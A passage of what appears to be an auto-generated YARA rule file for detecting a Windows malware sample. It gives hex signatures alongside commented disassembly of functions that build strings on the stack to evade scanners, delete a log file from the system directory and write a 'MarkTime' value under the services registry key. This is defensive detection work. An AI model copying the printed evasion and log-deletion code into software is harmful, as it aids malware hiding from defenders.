8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 00 FF D6 8D 8C 24 ?? ?? ?? ?? 8D 54 24 ?? 51 8D 84 24 ?? ?? ?? ?? 52 8D 4C 24 ?? 50 8D 54 24 ?? 51 8D 84 24 ?? ?? ?? ?? 52 8D 8C 24 ?? ?? ?? ?? 50 8D 54 24 ?? 51 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 2C 6A 00 FF D6 68 10 27 00 00 E8 ?? ?? ?? ?? 83 C4 04 8B F8 C6 84 24 ?? ?? ?? ?? 00 C6 44 24 ?? 25 6A 00 C6 44 24 ?? 73 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 2E C6 44 24 ?? 76 C6 44 24 ?? 62 C6 44 24 ?? 73 C6 44 24 ?? 00 FF D6 8D 84 24 ?? ?? ?? ?? 57 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 10 6A 00 FF D6 6A 00 6A 00 6A 02 6A 00 6A 00 8D 84 24 ?? ?? ?? ?? 68 00 00 00 40 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 8C 24 ?? ?? ?? ?? 6A 00 51 8D 94 24 ?? ?? ?? ?? 68 F4 01 00 00 52 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 57 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 C6 44 24 ?? 6F C6 44 24 ?? 70 88 5C 24 ?? 6A 00 C6 44 24 ?? 6E C6 44 24 ?? 00 FF D6 6A 00 6A 00 8D 84 24 ?? ?? ?? ?? 6A 00 8D 4C 24 ?? 50 51 6A 00 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 6A 00 FF 15 ?? ?? ?? ?? 5F 5E 5B 90 90 90 90 90 90 90 90 90 81 EC 34 01 00 00 B0 45 53 56 8B 35 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? 57 B0 65 B3 74 B1 79 6A 00 C6 44 24 ?? 4B C6 44 24 ?? 52 C6 44 24 ?? 4E C6 44 24 ?? 4C C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 6C C6 44 24 ?? 6C C6 44 24 ?? 00 C6 44 24 ?? 47 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 53 88 4C 24 ?? C6 44 24 ?? 73 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 6D C6 44 24 ?? 44 C6 44 24 ?? 69 C6 44 24 ?? 72 88 44 24 ?? C6 44 24 ?? 63 88 5C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 72 88 4C 24 ?? C6 44 24 ?? 41 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 54 24 ?? 68 04 01 00 00 52 FF D7 6A 00 FF D6 6A 00 FF D6 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 6F C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 61 88 5C 24 ?? C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 E8 ?? ?? ?? ?? 5F 5E 5B 81 C4 34 01 00 00 C3 } + /* +Basic Block at 0x00406270@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406270 + .text:0x00406270 FUNC: int cdecl sub_00406270( ) [2 XREFS] + .text:0x00406270 + .text:0x00406270 Stack Variables: (offset from initial top of stack) + .text:0x00406270 -260: int local260 + .text:0x00406270 -261: int local261 + .text:0x00406270 -262: int local262 + .text:0x00406270 -263: int local263 + .text:0x00406270 -264: int local264 + .text:0x00406270 -265: int local265 + .text:0x00406270 -266: int local266 + .text:0x00406270 -267: int local267 + .text:0x00406270 -268: int local268 + .text:0x00406270 -269: int local269 + .text:0x00406270 -270: int local270 + .text:0x00406270 -271: int local271 + .text:0x00406270 -272: int local272 + .text:0x00406270 -273: int local273 + .text:0x00406270 -274: int local274 + .text:0x00406270 -275: int local275 + .text:0x00406270 -276: int local276 + .text:0x00406270 -277: int local277 + .text:0x00406270 -278: int local278 + .text:0x00406270 -279: int local279 + .text:0x00406270 -280: int local280 + .text:0x00406270 -284: int local284 + .text:0x00406270 -285: int local285 + .text:0x00406270 -286: int local286 + .text:0x00406270 -287: int local287 + .text:0x00406270 -288: int local288 + .text:0x00406270 -289: int local289 + .text:0x00406270 -290: int local290 + .text:0x00406270 -291: int local291 + .text:0x00406270 -292: int local292 + .text:0x00406270 -293: int local293 + .text:0x00406270 -294: int local294 + .text:0x00406270 -295: int local295 + .text:0x00406270 -296: int local296 + .text:0x00406270 -297: int local297 + .text:0x00406270 -298: int local298 + .text:0x00406270 -299: int local299 + .text:0x00406270 -300: int local300 + .text:0x00406270 -301: int local301 + .text:0x00406270 -302: int local302 + .text:0x00406270 -303: int local303 + .text:0x00406270 -304: int local304 + .text:0x00406270 -305: int local305 + .text:0x00406270 -306: int local306 + .text:0x00406270 -307: int local307 + .text:0x00406270 -308: int local308 + .text:0x00406270 + .text:0x00406270 81ec34010000 sub esp,308 + .text:0x00406276 b045 mov al,69 + .text:0x00406278 53 push ebx + .text:0x00406279 56 push esi + .text:0x0040627a 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406280 88442415 mov byte [esp + 21],al + .text:0x00406284 88442418 mov byte [esp + 24],al + .text:0x00406288 57 push edi + .text:0x00406289 b065 mov al,101 + .text:0x0040628b b374 mov bl,116 + .text:0x0040628d b179 mov cl,121 + .text:0x0040628f 6a00 push 0 + .text:0x00406291 c644241c4b mov byte [esp + 28],75 + .text:0x00406296 c644241e52 mov byte [esp + 30],82 + .text:0x0040629b c644241f4e mov byte [esp + 31],78 + .text:0x004062a0 c64424214c mov byte [esp + 33],76 + .text:0x004062a5 c644242233 mov byte [esp + 34],51 + .text:0x004062aa c644242332 mov byte [esp + 35],50 + .text:0x004062af c64424242e mov byte [esp + 36],46 + .text:0x004062b4 c644242564 mov byte [esp + 37],100 + .text:0x004062b9 c64424266c mov byte [esp + 38],108 + .text:0x004062be c64424276c mov byte [esp + 39],108 + .text:0x004062c3 c644242800 mov byte [esp + 40],0 + .text:0x004062c8 c644242c47 mov byte [esp + 44],71 + .text:0x004062cd 8844242d mov byte [esp + 45],al + .text:0x004062d1 885c242e mov byte [esp + 46],bl + .text:0x004062d5 c644242f53 mov byte [esp + 47],83 + .text:0x004062da 884c2430 mov byte [esp + 48],cl + .text:0x004062de c644243173 mov byte [esp + 49],115 + .text:0x004062e3 885c2432 mov byte [esp + 50],bl + .text:0x004062e7 88442433 mov byte [esp + 51],al + .text:0x004062eb c64424346d mov byte [esp + 52],109 + .text:0x004062f0 c644243544 mov byte [esp + 53],68 + .text:0x004062f5 c644243669 mov byte [esp + 54],105 + .text:0x004062fa c644243772 mov byte [esp + 55],114 + .text:0x004062ff 88442438 mov byte [esp + 56],al + .text:0x00406303 c644243963 mov byte [esp + 57],99 + .text:0x00406308 885c243a mov byte [esp + 58],bl + .text:0x0040630c c644243b6f mov byte [esp + 59],111 + .text:0x00406311 c644243c72 mov byte [esp + 60],114 + .text:0x00406316 884c243d mov byte [esp + 61],cl + .text:0x0040631a c644243e41 mov byte [esp + 62],65 + .text:0x0040631f c644243f00 mov byte [esp + 63],0 + .text:0x00406324 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406326 8d442428 lea eax,dword [esp + 40] + .text:0x0040632a 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040632e 50 push eax + .text:0x0040632f 51 push ecx + .text:0x00406330 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local1472) + .text:0x00406336 50 push eax + .text:0x00406337 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(kernel32,local1456) + .text:0x0040633d 6a00 push 0 + .text:0x0040633f 8bf8 mov edi,eax + .text:0x00406341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406343 8d54243c lea edx,dword [esp + 60] + .text:0x00406347 6804010000 push 260 + .text:0x0040634c 52 push edx + .text:0x0040634d ffd7 call edi ;kernel32.GetSystemDirectoryA(local1436,260) + .text:0x0040634f 6a00 push 0 + .text:0x00406351 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406353 6a00 push 0 + .text:0x00406355 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406357 6a00 push 0 + .text:0x00406359 c64424105c mov byte [esp + 16],92 + .text:0x0040635e c64424116f mov byte [esp + 17],111 + .text:0x00406363 c644241275 mov byte [esp + 18],117 + .text:0x00406368 c644241372 mov byte [esp + 19],114 + .text:0x0040636d c64424146c mov byte [esp + 20],108 + .text:0x00406372 c64424156f mov byte [esp + 21],111 + .text:0x00406377 c644241667 mov byte [esp + 22],103 + .text:0x0040637c c64424172e mov byte [esp + 23],46 + .text:0x00406381 c644241864 mov byte [esp + 24],100 + .text:0x00406386 c644241961 mov byte [esp + 25],97 + .text:0x0040638b 885c241a mov byte [esp + 26],bl + .text:0x0040638f c644241b00 mov byte [esp + 27],0 + .text:0x00406394 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406396 8d44240c lea eax,dword [esp + 12] + .text:0x0040639a 8d4c243c lea ecx,dword [esp + 60] + .text:0x0040639e 50 push eax + .text:0x0040639f 51 push ecx + .text:0x004063a0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local1436,local1484) + .text:0x004063a6 6a00 push 0 + .text:0x004063a8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063aa 6a00 push 0 + .text:0x004063ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063ae 8d54243c lea edx,dword [esp + 60] + .text:0x004063b2 52 push edx + .text:0x004063b3 ff1518914000 call dword [0x00409118] ;kernel32.DeleteFileA(local1436) + .text:0x004063b9 6a00 push 0 + .text:0x004063bb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063bd e85ef5ffff call 0x00405920 ;sub_00405920() + .text:0x004063c2 5f pop edi + .text:0x004063c3 5e pop esi + .text:0x004063c4 5b pop ebx + .text:0x004063c5 81c434010000 add esp,308 + .text:0x004063cb c3 ret + */ + $c7 = { 81 EC 34 01 00 00 B0 45 53 56 8B 35 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? 57 B0 65 B3 74 B1 79 6A 00 C6 44 24 ?? 4B C6 44 24 ?? 52 C6 44 24 ?? 4E C6 44 24 ?? 4C C6 44 24 ?? 33 C6 44 24 ?? 32 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 6C C6 44 24 ?? 6C C6 44 24 ?? 00 C6 44 24 ?? 47 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 53 88 4C 24 ?? C6 44 24 ?? 73 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 6D C6 44 24 ?? 44 C6 44 24 ?? 69 C6 44 24 ?? 72 88 44 24 ?? C6 44 24 ?? 63 88 5C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 72 88 4C 24 ?? C6 44 24 ?? 41 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8D 54 24 ?? 68 04 01 00 00 52 FF D7 6A 00 FF D6 6A 00 FF D6 6A 00 C6 44 24 ?? 5C C6 44 24 ?? 6F C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 6F C6 44 24 ?? 67 C6 44 24 ?? 2E C6 44 24 ?? 64 C6 44 24 ?? 61 88 5C 24 ?? C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 6A 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 E8 ?? ?? ?? ?? 5F 5E 5B 81 C4 34 01 00 00 C3 } + /* +Basic Block at 0x00406650@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406650 + .text:0x00406650 FUNC: int cdecl sub_00406650( int arg0, ) [4 XREFS] + .text:0x00406650 + .text:0x00406650 Stack Variables: (offset from initial top of stack) + .text:0x00406650 4: int arg0 + .text:0x00406650 -1023: int local1023 + .text:0x00406650 -1024: int local1024 + .text:0x00406650 -1283: int local1283 + .text:0x00406650 -1284: int local1284 + .text:0x00406650 -1290: int local1290 + .text:0x00406650 -1292: int local1292 + .text:0x00406650 -1294: int local1294 + .text:0x00406650 -1298: int local1298 + .text:0x00406650 -1300: int local1300 + .text:0x00406650 -1304: int local1304 + .text:0x00406650 -1305: int local1305 + .text:0x00406650 -1306: int local1306 + .text:0x00406650 -1307: int local1307 + .text:0x00406650 -1308: int local1308 + .text:0x00406650 -1309: int local1309 + .text:0x00406650 -1310: int local1310 + .text:0x00406650 -1311: int local1311 + .text:0x00406650 -1312: int local1312 + .text:0x00406650 -1313: int local1313 + .text:0x00406650 -1314: int local1314 + .text:0x00406650 -1315: int local1315 + .text:0x00406650 -1316: int local1316 + .text:0x00406650 -1317: int local1317 + .text:0x00406650 -1318: int local1318 + .text:0x00406650 -1319: int local1319 + .text:0x00406650 -1320: int local1320 + .text:0x00406650 -1321: int local1321 + .text:0x00406650 -1322: int local1322 + .text:0x00406650 -1323: int local1323 + .text:0x00406650 -1324: int local1324 + .text:0x00406650 -1325: int local1325 + .text:0x00406650 -1326: int local1326 + .text:0x00406650 -1327: int local1327 + .text:0x00406650 -1328: int local1328 + .text:0x00406650 -1329: int local1329 + .text:0x00406650 -1330: int local1330 + .text:0x00406650 -1331: int local1331 + .text:0x00406650 -1332: int local1332 + .text:0x00406650 -1333: int local1333 + .text:0x00406650 -1334: int local1334 + .text:0x00406650 -1335: int local1335 + .text:0x00406650 -1336: int local1336 + .text:0x00406650 -1337: int local1337 + .text:0x00406650 -1338: int local1338 + .text:0x00406650 -1339: int local1339 + .text:0x00406650 -1340: int local1340 + .text:0x00406650 -1341: int local1341 + .text:0x00406650 -1342: int local1342 + .text:0x00406650 -1343: int local1343 + .text:0x00406650 -1344: int local1344 + .text:0x00406650 -1345: int local1345 + .text:0x00406650 -1346: int local1346 + .text:0x00406650 -1347: int local1347 + .text:0x00406650 -1348: int local1348 + .text:0x00406650 -1349: int local1349 + .text:0x00406650 -1350: int local1350 + .text:0x00406650 -1351: int local1351 + .text:0x00406650 -1352: int local1352 + .text:0x00406650 -1353: int local1353 + .text:0x00406650 -1354: int local1354 + .text:0x00406650 -1355: int local1355 + .text:0x00406650 -1356: int local1356 + .text:0x00406650 -1357: int local1357 + .text:0x00406650 -1358: int local1358 + .text:0x00406650 -1359: int local1359 + .text:0x00406650 -1360: int local1360 + .text:0x00406650 -1361: int local1361 + .text:0x00406650 -1362: int local1362 + .text:0x00406650 -1363: int local1363 + .text:0x00406650 -1364: int local1364 + .text:0x00406650 -1368: int local1368 + .text:0x00406650 -1369: int local1369 + .text:0x00406650 -1370: int local1370 + .text:0x00406650 -1371: int local1371 + .text:0x00406650 -1372: int local1372 + .text:0x00406650 -1373: int local1373 + .text:0x00406650 -1374: int local1374 + .text:0x00406650 -1375: int local1375 + .text:0x00406650 -1376: int local1376 + .text:0x00406650 + .text:0x00406650 81ec60050000 sub esp,1376 + .text:0x00406656 53 push ebx + .text:0x00406657 55 push ebp + .text:0x00406658 56 push esi + .text:0x00406659 57 push edi + .text:0x0040665a b9ff000000 mov ecx,255 + .text:0x0040665f 33c0 xor eax,eax + .text:0x00406661 8dbc2471010000 lea edi,dword [esp + 369] + .text:0x00406668 c684247001000000 mov byte [esp + 368],0 + .text:0x00406670 f3ab rep: stosd + .text:0x00406672 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406678 6a00 push 0 + .text:0x0040667a 66ab stosd + .text:0x0040667c aa stosb + .text:0x0040667d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040667f b343 mov bl,67 + .text:0x00406681 b053 mov al,83 + .text:0x00406683 885c243b mov byte [esp + 59],bl + .text:0x00406687 885c2442 mov byte [esp + 66],bl + .text:0x0040668b b36f mov bl,111 + .text:0x0040668d 88442434 mov byte [esp + 52],al + .text:0x00406691 88442436 mov byte [esp + 54],al + .text:0x00406695 885c2443 mov byte [esp + 67],bl + .text:0x00406699 885c2447 mov byte [esp + 71],bl + .text:0x0040669d 88442449 mov byte [esp + 73],al + .text:0x004066a1 8844244d mov byte [esp + 77],al + .text:0x004066a5 b25c mov dl,92 + .text:0x004066a7 b174 mov cl,116 + .text:0x004066a9 b073 mov al,115 + .text:0x004066ab b325 mov bl,37 + .text:0x004066ad 6a00 push 0 + .text:0x004066af c644243959 mov byte [esp + 57],89 + .text:0x004066b4 c644243b54 mov byte [esp + 59],84 + .text:0x004066b9 c644243c45 mov byte [esp + 60],69 + .text:0x004066be c644243d4d mov byte [esp + 61],77 + .text:0x004066c3 8854243e mov byte [esp + 62],dl + .text:0x004066c7 c644244075 mov byte [esp + 64],117 + .text:0x004066cc c644244172 mov byte [esp + 65],114 + .text:0x004066d1 c644244272 mov byte [esp + 66],114 + .text:0x004066d6 c644244365 mov byte [esp + 67],101 + .text:0x004066db c64424446e mov byte [esp + 68],110 + .text:0x004066e0 884c2445 mov byte [esp + 69],cl + .text:0x004066e4 c64424486e mov byte [esp + 72],110 + .text:0x004066e9 884c2449 mov byte [esp + 73],cl + .text:0x004066ed c644244a72 mov byte [esp + 74],114 + .text:0x004066f2 c644244c6c mov byte [esp + 76],108 + .text:0x004066f7 c644244e65 mov byte [esp + 78],101 + .text:0x004066fc 884c244f mov byte [esp + 79],cl + .text:0x00406700 88542450 mov byte [esp + 80],dl + .text:0x00406704 c644245265 mov byte [esp + 82],101 + .text:0x00406709 c644245372 mov byte [esp + 83],114 + .text:0x0040670e c644245476 mov byte [esp + 84],118 + .text:0x00406713 c644245569 mov byte [esp + 85],105 + .text:0x00406718 c644245663 mov byte [esp + 86],99 + .text:0x0040671d c644245765 mov byte [esp + 87],101 + .text:0x00406722 88442458 mov byte [esp + 88],al + .text:0x00406726 88542459 mov byte [esp + 89],dl + .text:0x0040672a 885c245a mov byte [esp + 90],bl + .text:0x0040672e 8844245b mov byte [esp + 91],al + .text:0x00406732 c644245c00 mov byte [esp + 92],0 + .text:0x00406737 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406739 8b842474050000 mov eax,dword [esp + 1396] + .text:0x00406740 8b2dd8914000 mov ebp,dword [0x004091d8] + .text:0x00406746 8d4c2434 lea ecx,dword [esp + 52] + .text:0x0040674a 50 push eax + .text:0x0040674b 8d942474010000 lea edx,dword [esp + 372] + .text:0x00406752 51 push ecx + .text:0x00406753 52 push edx + .text:0x00406754 ffd5 call ebp ;user32.wsprintfA(local1024,local1340) + .text:0x00406756 83c40c add esp,12 + .text:0x00406759 6a00 push 0 + .text:0x0040675b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040675d 6a00 push 0 + .text:0x0040675f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406761 8d44245c lea eax,dword [esp + 92] + .text:0x00406765 50 push eax + .text:0x00406766 ff1528914000 call dword [0x00409128] ;kernel32.GetLocalTime(local1300) + .text:0x0040676c b940000000 mov ecx,64 + .text:0x00406771 33c0 xor eax,eax + .text:0x00406773 8d7c246d lea edi,dword [esp + 109] + .text:0x00406777 c644246c00 mov byte [esp + 108],0 + .text:0x0040677c f3ab rep: stosd + .text:0x0040677e 66ab stosd + .text:0x00406780 aa stosb + .text:0x00406781 b064 mov al,100 + .text:0x00406783 b22e mov dl,46 + .text:0x00406785 b132 mov cl,50 + .text:0x00406787 6a00 push 0 + .text:0x00406789 885c2420 mov byte [esp + 32],bl + .text:0x0040678d c644242134 mov byte [esp + 33],52 + .text:0x00406792 88442422 mov byte [esp + 34],al + .text:0x00406796 c64424232d mov byte [esp + 35],45 + .text:0x0040679b 885c2424 mov byte [esp + 36],bl + .text:0x0040679f 88542425 mov byte [esp + 37],dl + .text:0x004067a3 884c2426 mov byte [esp + 38],cl + .text:0x004067a7 88442427 mov byte [esp + 39],al + .text:0x004067ab c64424282d mov byte [esp + 40],45 + .text:0x004067b0 885c2429 mov byte [esp + 41],bl + .text:0x004067b4 8854242a mov byte [esp + 42],dl + .text:0x004067b8 884c242b mov byte [esp + 43],cl + .text:0x004067bc 8844242c mov byte [esp + 44],al + .text:0x004067c0 c644242d20 mov byte [esp + 45],32 + .text:0x004067c5 885c242e mov byte [esp + 46],bl + .text:0x004067c9 8854242f mov byte [esp + 47],dl + .text:0x004067cd 884c2430 mov byte [esp + 48],cl + .text:0x004067d1 88442431 mov byte [esp + 49],al + .text:0x004067d5 c64424323a mov byte [esp + 50],58 + .text:0x004067da 885c2433 mov byte [esp + 51],bl + .text:0x004067de 88542434 mov byte [esp + 52],dl + .text:0x004067e2 884c2435 mov byte [esp + 53],cl + .text:0x004067e6 88442436 mov byte [esp + 54],al + .text:0x004067ea c644243700 mov byte [esp + 55],0 + .text:0x004067ef ffd6 call esi ;kernel32.Sleep(0) + .text:0x004067f1 8b4c2466 mov ecx,dword [esp + 102] + .text:0x004067f5 8b542464 mov edx,dword [esp + 100] + .text:0x004067f9 8b442462 mov eax,dword [esp + 98] + .text:0x004067fd 81e1ffff0000 and ecx,0x0000ffff + .text:0x00406803 81e2ffff0000 and edx,0x0000ffff + .text:0x00406809 51 push ecx + .text:0x0040680a 8b4c2462 mov ecx,dword [esp + 98] + .text:0x0040680e 52 push edx + .text:0x0040680f 8b542464 mov edx,dword [esp + 100] + .text:0x00406813 25ffff0000 and eax,0x0000ffff + .text:0x00406818 81e1ffff0000 and ecx,0x0000ffff + .text:0x0040681e 50 push eax + .text:0x0040681f 81e2ffff0000 and edx,0x0000ffff + .text:0x00406825 51 push ecx + .text:0x00406826 8d44242c lea eax,dword [esp + 44] + .text:0x0040682a 52 push edx + .text:0x0040682b 8d8c2480000000 lea ecx,dword [esp + 128] + .text:0x00406832 50 push eax + .text:0x00406833 51 push ecx + .text:0x00406834 ffd5 call ebp ;user32.wsprintfA(local1284,local1364) + .text:0x00406836 83c41c add esp,28 + .text:0x00406839 6a00 push 0 + .text:0x0040683b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040683d 8d54246c lea edx,dword [esp + 108] + .text:0x00406841 6a00 push 0 + .text:0x00406843 52 push edx + .text:0x00406844 c64424184d mov byte [esp + 24],77 + .text:0x00406849 c644241961 mov byte [esp + 25],97 + .text:0x0040684e c644241a72 mov byte [esp + 26],114 + .text:0x00406853 c644241b6b mov byte [esp + 27],107 + .text:0x00406858 c644241c54 mov byte [esp + 28],84 + .text:0x0040685d c644241d69 mov byte [esp + 29],105 + .text:0x00406862 c644241e6d mov byte [esp + 30],109 + .text:0x00406867 c644241f65 mov byte [esp + 31],101 + .text:0x0040686c c644242000 mov byte [esp + 32],0 + .text:0x00406871 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1284) + .text:0x00406877 50 push eax + .text:0x00406878 8d442474 lea eax,dword [esp + 116] + .text:0x0040687c 50 push eax + .text:0x0040687d 8d4c241c lea ecx,dword [esp + 28] + .text:0x00406881 6a01 push 1 + .text:0x00406883 8d942480010000 lea edx,dword [esp + 384] + .text:0x0040688a 51 push ecx + .text:0x0040688b 52 push edx + .text:0x0040688c 6802000080 push 0x80000002 + .text:0x00406891 e84ae3ffff call 0x00404be0 ;sub_00404be0(0x80000002,local1024,local1376,1,local1284,kernel32.lstrlenA(local1284),0) + .text:0x00406896 83c41c add esp,28 + .text:0x00406899 5f pop edi + .text:0x0040689a 5e pop esi + .text:0x0040689b 5d pop ebp + .text:0x0040689c 5b pop ebx + .text:0x0040689d 81c460050000 add esp,1376 + .text:0x004068a3 c3 ret + */ + $c8 = { 81 EC 60 05 00 00 53 55 56 57 B9 FF 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 F3 AB 8B 35 ?? ?? ?? ?? 6A 00 66 AB AA FF D6 B3 43 B0 53 88 5C 24 ?? 88 5C 24 ?? B3 6F 88 44 24 ?? 88 44 24 ?? 88 5C 24 ?? 88 5C 24 ?? 88 44 24 ?? 88 44 24 ?? B2 5C B1 74 B0 73 B3 25 6A 00 C6 44 24 ?? 59 C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D 88 54 24 ?? C6 44 24 ?? 75 C6 44 24 ?? 72 C6 44 24 ?? 72 C6 44 24 ?? 65 C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 6E 88 4C 24 ?? C6 44 24 ?? 72 C6 44 24 ?? 6C C6 44 24 ?? 65 88 4C 24 ?? 88 54 24 ?? C6 44 24 ?? 65 C6 44 24 ?? 72 C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 C6 44 24 ?? 65 88 44 24 ?? 88 54 24 ?? 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 84 24 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 FF D5 83 C4 0C 6A 00 FF D6 6A 00 FF D6 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB AA B0 64 B2 2E B1 32 6A 00 88 5C 24 ?? C6 44 24 ?? 34 88 44 24 ?? C6 44 24 ?? 2D 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 2D 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 20 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 3A 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 81 E1 FF FF 00 00 81 E2 FF FF 00 00 51 8B 4C 24 ?? 52 8B 54 24 ?? 25 FF FF 00 00 81 E1 FF FF 00 00 50 81 E2 FF FF 00 00 51 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 51 FF D5 83 C4 1C 6A 00 FF D6 8D 54 24 ?? 6A 00 52 C6 44 24 ?? 4D C6 44 24 ?? 61 C6 44 24 ?? 72 C6 44 24 ?? 6B C6 44 24 ?? 54 C6 44 24 ?? 69 C6 44 24 ?? 6D C6 44 24 ?? 65 C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 4C 24 ?? 6A 01 8D 94 24 ?? ?? ?? ?? 51 52 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 1C 5F 5E 5D 5B 81 C4 60 05 00 00 C3 } + /* +Basic Block at 0x00406c90@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406c90 + .text:0x00406c90 FUNC: int cdecl sub_00406c90( int arg0, int arg1, ) [4 XREFS] + .text:0x00406c90 + .text:0x00406c90 Stack Variables: (offset from initial top of stack) + .text:0x00406c90 8: int arg1 + .text:0x00406c90 4: int arg0 + .text:0x00406c90 -256: int local256 + .text:0x00406c90 -259: int local259 + .text:0x00406c90 -260: int local260 + .text:0x00406c90 -261: int local261 + .text:0x00406c90 -262: int local262 + .text:0x00406c90 -263: int local263 + .text:0x00406c90 -264: int local264 + .text:0x00406c90 -265: int local265 + .text:0x00406c90 -266: int local266 + .text:0x00406c90 -267: int local267 + .text:0x00406c90 -268: int local268 + .text:0x00406c90 + .text:0x00406c90 81ec0c010000 sub esp,268 + .text:0x00406c96 56 push esi + .text:0x00406c97 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406c9d 6a00 push 0 + .text:0x00406c9f c64424084d mov byte [esp + 8],77 + .text:0x00406ca4 c64424096f mov byte [esp + 9],111 + .text:0x00406ca9 c644240a74 mov byte [esp + 10],116 + .text:0x00406cae c644240b68 mov byte [esp + 11],104 + .text:0x00406cb3 c644240c65 mov byte [esp + 12],101 + .text:0x00406cb8 c644240d72 mov byte [esp + 13],114 + .text:0x00406cbd c644240e33 mov byte [esp + 14],51 + .text:0x00406cc2 c644240f36 mov byte [esp + 15],54 + .text:0x00406cc7 c644241030 mov byte [esp + 16],48 + .text:0x00406ccc c644241100 mov byte [esp + 17],0 + .text:0x00406cd1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406cd3 8d442404 lea 